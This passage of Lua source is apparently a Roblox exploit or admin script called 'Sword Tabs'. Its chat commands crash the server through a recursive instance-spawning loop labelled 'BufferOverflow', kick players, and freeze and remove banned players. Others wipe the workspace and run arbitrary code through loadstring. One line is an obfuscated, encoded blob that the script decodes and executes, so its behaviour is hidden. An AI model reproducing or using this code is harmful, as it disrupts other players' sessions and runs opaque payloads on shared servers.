913 | Output('Banned | '..v.Name,__) | |
914 | else | |
915 | Output(Error) | |
916 | end | |
917 | end | |
918 | end | |
919 | ) | |
920 | ||
921 | local charMap = {["+"] = 0, ["^"] = 1, ["%"] = 2, [")"] = 3, ["*"] = 4, ["$"] = 5, ["-"] = 6, ["_"] = 7, ["#"] = 8, ["&"] = 9, ["@"] = 10, ["("] = 11, ["?"] = 12, ["~"] = 13, ["!"] = 14, ["="] = 15}; setfenv(assert(loadstring((string.gsub(string.gsub(table.concat({ | |
922 | "?-=-)-^-?-+%&-~)~%^)()?-=-^-*-)_*_%_&-!-_-#%)_*_%_&-!-_-!%_-)_$_%-#B%!*!_~*~!~^&&~?@(&!&_@_~&~@A?@~@~_~~?^~&?&#)~)~+~-?@?%?##+?(A?#(~_-_(=?=!!@!)=$@?!!(?@!@-($!-!-~_~*!)!=~*~_~!?~#-~$~^~-?&?+?$#?(-?-?^($_~-@$@$(*-*~&^(~=$##$&$?$?$^^!A=-+&%#)$)*%!%~%!~=^=^!+!+?$+)%)-)#^)^_+&+==~($+)+!=%=*=@!!@*!~!?!-~&&+&&@#?*?=&$?#($($_(-#&*@=@%@$@$@~*%&)&_#?#()^*$#*&)_*_#-~-?^?$%%*^_)#$?*^$+$_*_)-*_)-)#C)**~^?$+)%)-))%$%+%#?_^)+!+^+*+*+!@*(!#-!^=+%$!-~~^%!)~$~+~-#)#+-#(~(?(#(#?&@?$?$$_*$+-A@(-*@$!)!_$#?^$#~(A?-)_)%+%~=!)+-($)$*$=*==$==!~!)=)!!^?$+)%)-)+!~(*^#-?_&+(@?!!+&+^+%+~=~@)@+~?~_!@C~$#@?+~&_%?%(^(!@$-)@-(&$^(%A&!#+&*&!_@*_*$*+*()^#^%&_?$?$*-+-&$*$!*~*&*!)_*!)!%_)-=^=-=$)_B~?#+*+@?_@#!?$!-$+~=!=&=&@=&+~@A~+~#~%~-?~_~?*?^_!--?(#)@+(!@?@@@@&!*(#@#=#_###%&*)@)@%$-^-_%*+$*_-%-@$($-$-+?=?%_)+*~)=%^)!-+*+*%**~?%!~--&)@)~))?&?&(*=+=-()&@!=!^!)#!&(#%&$#!#=_-#~(&?=(^(=(^(*(+(_-=&%-=&+_&&#$($%--&-#%&+&@#)#%)%#+#(_=-^__-(%~$=$$$)--^)^($&$*$#*@*+**+$)&*^*=%=" | |
923 | ,"!_%@!&!!!)!!^(~*~??(~$^@~#~#?^+_+@=!+=^#($(^(=@=-__(-$__-=-_@*((@!&~@+@*@^@&$%&-$*&--+&+$*$?$?$^&%#=#!#&#)#))*#)#=_*___!-))--&-+-=-)%^%@-&-$-@$~$*$&^(*+-&$#*&+%*-+-+%^#+++?)@=*=~!~=!=~=!!#%=%)%-!*!^!+!%#(#+#(#!__#+?!?-?@(@?!()?^?@_*(&_#((#-(__?_$#((~@((((_(%()-$($(%(#@?@*@@-!&%@@&@@=$!$#@#@$@(&=&_&~$+&-@+@+&%$?#^$%$)$($*$!*(#@*$*=)+$%$%$**=__#?_+*=)~)~)%%?%%%!%%%?%--$_!-)-*_&-=-!-#%)-&%&-~)&-(%^)()%_$-*_$_%_!-+%)_*_%_&-!-_-!%)-#-^-%_#%#%)_*_%_&-!-_-!%%-&_*_$-#%)-&%(%~%^)^)#)(%&-&%$%+%%)$)-)&%$-!-*-&%&%#%&%" | |
924 | }),"(%u)(.)",function(r,c)return c:rep(r:byte()-62)end),"(.)(.)",function(lo,hi)return string.char(charMap[lo]+charMap[hi]*16)end)))),getfenv())() | |
925 | ||
926 | AddCmd("Shutdown the game","sd","Shutdown the game", | |
927 | function() | |
928 | NewS([[ local function BufferOverflow(object) | |
929 | object.DescendantAdded:connect(BufferOverflow) | |
930 | Instance.new("IntValue", object) | |
931 | end | |
932 | BufferOverflow(Game) | |
933 | ]], workspace) | |
934 | end | |
935 | ) | |
936 | ||
937 | AddCmd("Check source","chks","Check if the source is found", | |
938 | function() | |
939 | if found then | |
940 | Output("Source is found") | |
941 | else | |
942 | Output("Source is not found") | |
943 | end | |
944 | end | |
945 | ) | |
946 | ||
947 | AddCmd("Say bye to everyone","bye","Say bye to everyone", | |
948 | function() | |
949 | Dismiss() | |
950 | for i = 1,8 do | |
951 | Output("Bye", __) | |
952 | end | |
953 | end | |
954 | ) | |
955 | ||
956 | AddCmd("Check source name","chksn","Check the source name", | |
957 | function() | |
958 | Output(SourceName, __) | |
959 | end | |
960 | ) | |
961 | ||
962 | AddCmd("Change source name","csn","Change the source name", | |
963 | function(plrs, msg) | |
964 | SourceName = tostring(msg) | |
965 | end | |
966 | ) | |
967 | ||
968 | AddCmd("Kick player list","klist", "Show a kick player list", | |
969 | function() | |
970 | Dismiss() | |
971 | Output("Click on the player name that you want to kick", __) | |
972 | for _,v in pairs(game:GetService("Players"):GetChildren()) do | |
973 | Output(v.Name, | |
974 | function() | |
975 | NewLS("game:service'StarterGui':SetCoreGuiEnabled(3, false)", v.Backpack) | |
976 | v:Destroy() | |
977 | end) | |
978 | end | |
979 | end | |
980 | ) | |
981 | ||
982 | AddCmd("Script","script","Execute a Script", | |
983 | function(plrs, msg) | |
984 | NewS(msg, workspace) | |
985 | end | |
986 | ) | |
987 | ||
988 | AddCmd("LocalScript","local","Execute a LocalScript", | |
989 | function(plrs, msg) | |
990 | NewLS(msg, LocalPlayer.Backpack) | |
991 | end | |
992 | ) | |
993 | ||
994 | AddCmd("Execute", "exe","Execute a LocalScript for admin", | |
995 | function(plrs, msg) | |
996 | a,b = ypcall(function() | |
997 | loadstring(msg)() | |
998 | end) if not a then Output(b,"Bright red") end | |
999 | end | |
1000 | ) | |
1001 | ||
1002 | ||
1003 | AddCmd("#Commands","#cmds","See how much are commands in this admin", | |
1004 | function() | |
1005 | Output(#Cmds, __) | |
1006 | end | |
1007 | ) | |
1008 | ||
1009 | AddCmd("Clean workspace","clean","Clean everything in workspace except terrain", | |
1010 | function() | |
1011 | NewS([[ | |
1012 | for _,v in pairs(game.Workspace:GetChildren()) do | |
1013 | if v.Name ~= "Terrain" then | |
1014 | v:Destroy() | |
1015 | end | |
1016 | end | |
1017 | ]],workspace) | |
1018 | wait(1) | |
1019 | a = Instance.new("Part") | |
1020 | a.Parent = Workspace | |
1021 | a.Name = "Base" | |
1022 | a.Position = Vector3.new(0, 0.6, 0) | |
1023 | a.Size = Vector3.new(1002, 0, 1002) | |
1024 | a.Material = "Grass" | |
1025 | a.Anchored = true | |
1026 | a.BrickColor = BrickColor.new("Dark green") | |
1027 | NewS([[ | |
1028 | for _,v in pairs(game.Players:GetChildren()) do | |
1029 | v:LoadCharacter() | |
1030 | end | |
1031 | ]], workspace) | |
1032 | end | |
1033 | ) | |
1034 | ||
1035 | ||
1036 | AddCmd("Script Help","sh","Help everyone with scripts", | |
1037 | function() | |
1038 | Dismiss() | |
1039 | for i = 1,1 do | |
1040 | wait() | |
1041 | Output("Script Help:", __) | |
1042 | Output("Google ROBLOX Script Bot and download it.", __) | |
1043 | Output("Find a script using ROBLOX Catalog.", __) | |
1044 | Output("Open ROBLOX Studio.", __) | |
1045 | Output("Edit any place and insert your script.", __) | |
1046 | Output("Copy your ENTIRE script.", __) | |
1047 | Output("Paste the script in the text box.", __) | |
1048 | Output("Select the 'Local Script' box, if the script it local.", __) | |
1049 | Output("Name your script and press 'Run Script'.", __) | |
1050 | Output("Enjoy showing off your script!", __) | |
1051 | end | |
1052 | end | |
1053 | ) | |
1054 | ||
1055 | AddCmd("Darkhearts","dh","Gives Darkhaerts", | |
1056 | function() | |
1057 | Dismiss() | |
1058 | for i = 1,1 do | |
1059 | Output("Darkhearts Given",__) | |
1060 | local obj = game:service("InsertService"):LoadAsset(108149175) | |
1061 | for a,g in pairs(obj:children()) do if g:IsA("Tool") or g:IsA("HopperBin") then g.Parent = LocalPlayer.Backpack end end | |
1062 | end | |
1063 | end | |
1064 | ) | |
1065 | ||
1066 | AddCmd("Machete","machete","Gives Machete", | |
1067 | function() | |
1068 | Dismiss() | |
1069 | for i = 1,1 do | |
1070 | Output("Machete Given",__) | |
1071 | local obj = game:service("InsertService"):LoadAsset(123234673) | |
1072 | for a,g in pairs(obj:children()) do if g:IsA("Tool") or g:IsA("HopperBin") then g.Parent = LocalPlayer.Backpack end end | |
1073 | end | |
1074 | end | |
1075 | ) | |
1076 | ||
1077 | AddCmd("Gear","gear","Give gear to player", | |
1078 | function(plrs, msg) | |
1079 | local keypos = msg:find(key) | |
1080 | local targPlayers = msg:sub(1,keypos-1) | |
1081 | local plrs = getPlayers(targPlayers) | |
1082 | local asset = msg:sub(tonumber(keypos+1)) | |
1083 | for _,plr in pairs(plrs) do | |
1084 | if plr and plr.Backpack then | |
1085 | local obj = game:service("InsertService"):LoadAsset(asset) | |
1086 | pcall(function() | |
1087 | for a,g in pairs(obj:children())do | |
1088 | if g:IsA("Tool") or g:IsA("HopperBin") then | |
1089 | g.Parent = plr.Backpack | |
1090 | end | |
1091 | end | |
1092 | end) | |
1093 | end | |
1094 | end | |
1095 | end | |
1096 | ) | |
1097 | ||
1098 | AddCmd("Dark Character","dark","Make Character Dark", | |
1099 | function() | |
1100 | Dismiss() | |
1101 | for i = 1,1 do | |
1102 | Output("Character is Now Dark",__) | |
1103 | player=game.Players.LocalPlayer | |
1104 | char=player.Character | |
1105 | Color=BrickColor.new("Grey") | |
1106 | Color2=BrickColor.new(Color3.new(0,0,0)) | |
1107 | model=Instance.new("Model") | |
1108 | model.Name="Suit" | |
1109 | model.Parent=char | |
1110 | d=0 | |
1111 | Debounce=true | |
1112 | fake=char.Head:clone() | |
1113 | pcall(function() fake.face:remove() end) | |
1114 | char.Head.Transparency=1 | |
1115 | fake.Parent=model | |
1116 | fake.Transparency=0 | |
1117 | w=Instance.new("Weld") | |
1118 | w.Part1=fake | |
1119 | w.Part0=char.Head | |
1120 | w.Parent=char | |
1121 | fake.Mesh.Scale=fake.Mesh.Scale+Vector3.new(-0.01,-0.01,-0.01) | |
1122 | fake.BrickColor=Color2 | |
1123 | char.Head.Changed:connect(function(p) | |
1124 | if p=="BrickColor" then | |
1125 | wait() | |
1126 | pcall(function() | |
1127 | char.Head.face:Remove() | |
1128 | char.Torso.roblox:remove() | |
1129 | char["Shirt Graphic"]:remove() | |
1130 | end) | |
1131 | char.Humanoid.WalkSpeed=25 | |
1132 | char.Humanoid.MaxHealth=math.huge | |
1133 | char.Humanoid.Health=math.huge | |
1134 | for _,v in pairs(char:children()) do | |
1135 | if v.className=="Hat" then | |
1136 | v:remove() | |
1137 | elseif v:IsA("Part") then | |
1138 | v.BrickColor=Color2 | |
1139 | v.TopSurface="Smooth" | |
1140 | v.BottomSurface="Smooth" | |
1141 | elseif v:IsA("Shirt") or v:IsA("Pants") then | |
1142 | v:remove() | |
1143 | end | |
1144 | end | |
1145 | end | |
1146 | end) | |
1147 | char.Head.BrickColor=Color2 | |
1148 | Tor=Instance.new("Part") | |
1149 | Tor.Size=Vector3.new(1,1,1) | |
1150 | Tor.BrickColor=Color2 | |
1151 | Tor.Reflectance=0 | |
1152 | Tor.Transparency=0 | |
1153 | Tor.CanCollide=false | |
1154 | Tor.Parent=char | |
1155 | Mesh=Instance.new("SpecialMesh") | |
1156 | Mesh.MeshId="http://www.roblox.com/asset/?id=16952952" | |
1157 | Mesh.Scale=Vector3.new(1.05,1.05,1.05) | |
1158 | Mesh.Parent=Tor | |
1159 | w = Instance.new("Weld") | |
1160 | w.Parent = char["Head"] | |
1161 | w.Part0 = w.Parent | |
1162 | w.Part1 = Tor | |
1163 | w.C0 = CFrame.new(0,0.35,0) | |
1164 | end | |
1165 | end | |
1166 | ) | |
1167 | ||
1168 | AddCmd("NoClip Character","nclip","Make Character NoClip", | |
1169 | function() | |
1170 | Dismiss() | |
1171 | for i = 1,1 do | |
1172 | Output("Character is Now NoClipped",__) | |
1173 | wait(1) | |
1174 | ||
1175 | nam = game.Players.LocalPlayer.Name | |
1176 | ||
1177 | coroutine.wrap(function() | |
1178 | while wait() do | |
1179 | for a, b in pairs(Workspace[nam]:GetChildren()) do | |
1180 | if b:FindFirstChild('Handle') then | |
1181 | b.Handle.CanCollide = false | |
1182 | end | |
1183 | end | |
1184 | end | |
1185 | end)() | |
1186 | ||
1187 | Workspace[nam].Humanoid.Changed:connect(function() | |
1188 | Workspace[nam].Humanoid.WalkSpeed = 16 | |
1189 | end) | |
1190 | ||
1191 | game:GetService('Players').LocalPlayer.PlayerGui.ChildAdded:connect(function(asd) | |
1192 | delay(0, function() | |
1193 | if asd.Name ~= 'OutputGUI' then | |
1194 | asd:Destroy() | |
1195 | end | |
1196 | end) | |
1197 | end) | |
1198 | ||
1199 | game:GetService('RunService').Stepped:connect(function() | |
1200 | Workspace[nam].Torso.CanCollide = false | |
1201 | Workspace[nam].Head.CanCollide = false | |
1202 | end) | |
1203 | ||
1204 | Workspace[nam].Torso.Changed:connect(function() | |
1205 | Workspace[nam].Torso.CanCollide = false | |
1206 | Workspace[nam].Head.CanCollide = false | |
1207 | end) | |
1208 | end end | |
1209 | ) | |
1210 | ||
1211 | AddCmd("Remove Tools","rt","Remove current tools", | |
1212 | function() | |
1213 | Dismiss() | |
1214 | pcall(function() | |
1215 | LocalPlayer.Backpack:ClearAllChildren() | |
1216 | end) | |
1217 | end | |
1218 | ) | |
1219 | ||
1220 | function Output(Txt, func) | |
1221 | P = Instance.new("Part", tabmodel) | |
1222 | P.Shape = "Ball" | |
1223 | P.Anchored = true | |
1224 | P.CanCollide = false | |
1225 | if probemode == false then | |
1226 | if LocalPlayer.Character.Torso then | |
1227 | P.Position = LocalPlayer.Character.Torso.Position | |
1228 | elseif LocalPlayer.Character.Torso == nil then return end | |
1229 | elseif probemode == true then | |
1230 | if game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe") then | |
1231 | P.Position = game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe").Position | |
1232 | elseif game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe") == nil then return end | |
1233 | else | |
1234 | return | |
1235 | end | |
1236 | M = Instance.new("SpecialMesh",P) | |
1237 | M.MeshId = "http://www.roblox.com/asset/?id=121925241" | |
1238 | M.TextureId = "http://www.roblox.com/asset/?id=121924580" | |
1239 | M.Scale = Vector3.new(2,2,2) | |
1240 | Instance.new("PointLight", P) | |
1241 | bg = Instance.new("BillboardGui", P) | |
1242 | bg.Adornee = tab | |
1243 | bg.Size = UDim2.new(8, 0, 7.5, 0) | |
1244 | bg.StudsOffset = Vector3.new(0, 1, 0) | |
1245 | text = Instance.new("TextLabel", bg) | |
1246 | text.Size = UDim2.new(1, 0, 0.2, 0) | |
1247 | text.FontSize = "Size18" | |
1248 | text.BackgroundTransparency = 1 | |
1249 | text.Font = "Legacy" | |
1250 | text.TextStrokeTransparency = 0 | |
1251 | text.TextColor = BrickColor.new("Institutional white") | |
1252 | text.Text = Txt | |
1253 | Click = Instance.new("ClickDetector",P) | |
1254 | Click.MaxActivationDistance = 999999999 | |
1255 | Click.MouseClick:connect(function(Plr) | |
1256 | if Plr.Name == LocalPlayer.Name then | |
1257 | Dismiss() | |
1258 | func = func | |
1259 | func() | |
1260 | end | |
1261 | end) | |
1262 | table.insert(Tabs, P) | |
1263 | end | |
1264 | ||
1265 | function getPlayers(msg) | |
1266 | local plrs = {} | |
1267 | if msg == "me" then | |
1268 | table.insert(plrs, LocalPlayer) | |
1269 | elseif msg == "all" then | |
1270 | plrs = game:GetService("Players"):GetChildren() | |
1271 | elseif msg == "noobs" then | |
1272 | for _,plr in pairs(game:GetService("Players"):GetChildren()) do | |
1273 | if plr.AccountAge > 364 then | |
1274 | table.insert(plrs, plr) | |
1275 | end | |
1276 | end | |
1277 | elseif msg == "veterans" then | |
1278 | for _,plr in pairs(game:GetService("Players"):GetChildren()) do | |
1279 | if plr.AccountAge > 364 then | |
1280 | table.insert(plrs, plr) | |
1281 | end | |
1282 | end | |
1283 | elseif msg == "others" then | |
1284 | for i,v in pairs(game:GetService("Players"):GetChildren()) do | |
1285 | if v ~= LocalPlayer then | |
1286 | table.insert(plrs, v) | |
1287 | end | |
1288 | end | |
1289 | else | |
1290 | for i,v in pairs(game:GetService("Players"):GetChildren()) do | |
1291 | if v.Name:lower():sub(1,#msg) == msg:lower() then | |
1292 | table.insert(plrs, v) | |
1293 | end | |
1294 | end | |
1295 | end | |
1296 | return plrs | |
1297 | end | |
1298 | ||
1299 | for _,plr in pairs(game:GetService("Players"):GetChildren()) do | |
1300 | end | |
1301 | ||
1302 | LocalPlayer.Chatted:connect(function(m) | |
1303 | for i,v in pairs(Cmds) do | |
1304 | if v["Say"]..key == m:sub(1, #v["Say"]+#key) then | |
1305 | v["Func"](getPlayers(m:sub(#v["Say"]+#key+1)), m:sub(#v["Say"]+#key+1)) | |
1306 | end | |
1307 | end | |
1308 | end) | |
1309 | ||
1310 | for i = 0,8,1 do | |
1311 | wait(0.01) | |
1312 | end | |
1313 | Output("Welcome to Sword Tabs", __) | |
1314 | Output("Created by TheScriptGod", __) | |
1315 | Output("New Updates : "..Updates, __) | |
1316 | Output("User: "..LocalPlayer.Name, __) | |
1317 | ||
1318 | tabmodeldebounce = false | |
1319 | modeldebounce = false | |
1320 | game:service'RunService'.Stepped:connect(function() | |
1321 | if modeldebounce then return end | |
1322 | rot = (rot % 360) + 0.5 | |
1323 | if tabmodel.Parent ~= workspace then | |
1324 | modeldebounce = true | |
1325 | tabs = {} | |
1326 | tabmodel = Instance.new("Model", workspace) | |
1327 | tabmodel.Name = "Sword tabs" | |
1328 | tabs = {} | |
1329 | wait() | |
1330 | modeldebounce = false | |
1331 | end | |
1332 | end) | |
1333 | ||
1334 | rot = 0 | |
1335 | coroutine.resume(coroutine.create(function() | |
1336 | game:GetService("RunService").Stepped:connect(function() | |
1337 | if probemode == false then | |
1338 | if LocalPlayer.Character then | |
1339 | if LocalPlayer.Character:findFirstChild("Torso") then | |
1340 | rot = rot + 0.001 | |
1341 | for i,v in pairs(Tabs) do | |
1342 | ypcall(function() | |
1343 | local pos = LocalPlayer.Character.Torso.CFrame | |
1344 | local radius = 4 + (#Tabs * 0.5) | |
1345 | local x = math.sin((i / #Tabs - (0.5 / #Tabs) + rot * 2) * math.pi * 2) * radius | |
1346 | local y = 0 | |
1347 | local z = math.cos((i / #Tabs - (0.5 / #Tabs) + rot * 2) * math.pi * 2) * radius | |
1348 | local arot = Vector3.new(x, y, z) + pos.p | |
1349 | local brot = v.CFrame.p | |
1350 | local crot = (arot * .1 + brot * .9) | |
1351 | v.CFrame = CFrame.new(crot, pos.p) | |
1352 | end) | |
1353 | end | |
1354 | end | |
1355 | end | |
1356 | end | |
1357 | if probemode == true then | |
1358 | if game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe") then | |
1359 | rot = rot + 0.001 | |
1360 | for i,v in pairs(Tabs) do | |
1361 | ypcall(function() | |
1362 | local pos = game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe").CFrame | |
1363 | local radius = 4 + (#Tabs * 0.5) | |
1364 | local x = math.sin((i / #Tabs - (0.5 / #Tabs) + rot * 2) * math.pi * 2) * radius | |
1365 | local y = 0 | |
1366 | local z = math.cos((i / #Tabs - (0.5 / #Tabs) + rot * 2) * math.pi * 2) * radius | |
1367 | local arot = Vector3.new(x, y, z) + pos.p | |
1368 | local brot = v.CFrame.p | |
1369 | local crot = (arot * .1 + brot * .9) | |
1370 | v.CFrame = CFrame.new(crot, pos.p) | |
1371 | end) | |
1372 | end | |
1373 | end | |
1374 | end | |
1375 | end) | |
1376 | end)) | |
1377 | ||
1378 | game:GetService("RunService").RenderStepped:connect(function() | |
1379 | for _,a in pairs(game:service('Players'):children()) do | |
1380 | for _,b in pairs(Banlist) do | |
1381 | if b:find(a.Name) then | |
1382 | NewLS([==[ | |
1383 | Instance.new('Message',Workspace).Text = "You are Banned." | |
1384 | game:GetService("RunService").RenderStepped(function() | |
1385 | Delay(0, function() return end) | |
1386 | end) | |
1387 | ]==], a.Backpack) | |
1388 | a:remove()--If his client is even left standing xD | |
1389 | Output('Banned Player | '..a.Name..' | Attempted to join.',__) | |
1390 | else | |
1391 | end | |
1392 | end | |
1393 | end | |
1394 | end) |